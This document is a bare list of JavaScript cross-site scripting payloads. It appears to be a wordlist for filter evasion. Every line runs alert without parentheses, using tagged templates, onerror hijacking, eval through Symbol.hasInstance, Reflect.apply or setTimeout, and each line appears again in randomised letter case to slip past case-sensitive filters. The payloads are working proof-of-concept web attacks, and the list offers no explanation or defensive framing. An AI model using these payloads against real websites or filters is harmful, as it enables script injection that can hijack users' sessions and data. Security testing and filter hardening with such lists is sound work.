'a'.replace.call`1${/./}${alert}`
'a'.ReplaCE.cAlL`1${/./}${alErt}`
'a,'.replace`a${alert}`
'A,'.RePlaCE`A${ALErT}`
'aLert\X281337\x29'InsTaNcEof{[syMbOl.hAsiNstANCe]:evAL}
'alert\x281337\x29'instanceof{[Symbol.hasInstance]:eval}
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
'ALerT\X281337\x29'INStAncEoF{[syMbOL['haSInstanCe']]:eVaL}
alert`1337`
alErT`1337`
alert`foo${1}bar`
ALERt`FoO${1}bAr`
alert`foobar`
ALErt`FOOBaR`
eval("onerror=\u2028alert\u2029throw 1337");
EvAL("ONerRoR=\U2028ALert\U2029throw 1337");
eval`alert\x281337\x29`
eVAl`AlerT\X281337\X29`
Function`x${'alert\x281337\x29'}```
fUncTION`x${'ALeRt\X281337\x29'}```
onerror=alert;throw 'foo'
ONeRRoR=alErT;throw 'foO'
Reflect.apply.call`${alert}${window}${[1337]}`
REFlEct.ApPly.CALl`${ALErT}${wINDOW}${[1337]}`
setTimeout`alert\x281337\x29`
sEttiMEoUt`aLERT\x281337\x29`
throw onerror=alert,1,2,3,4,5,6,7,8,9,10
thrOW oNeRror=aLeRT,1,2,3,4,5,6,7,8,9,10
throw onerror=alert,1337
THrow OneRror=aLErt,1337
try{throw onerror=alert}catch{throw 1337}
tRy{tHrow oNErrOr=AleRT}catcH{THrOW 1337}
window.valueOf=alert;window+1
wiNDoW.vaLUeof=aLErT;WINdOW+1
x`${'foo'}${'bar'}${'baz'}`
x`${'foo'}${'bAR'}${'BAz'}`
`${alert(1337)}`
`${aLerT(1337)}`
`${`${AlerT(1337)}`}`
`${`${alert(1337)}`}`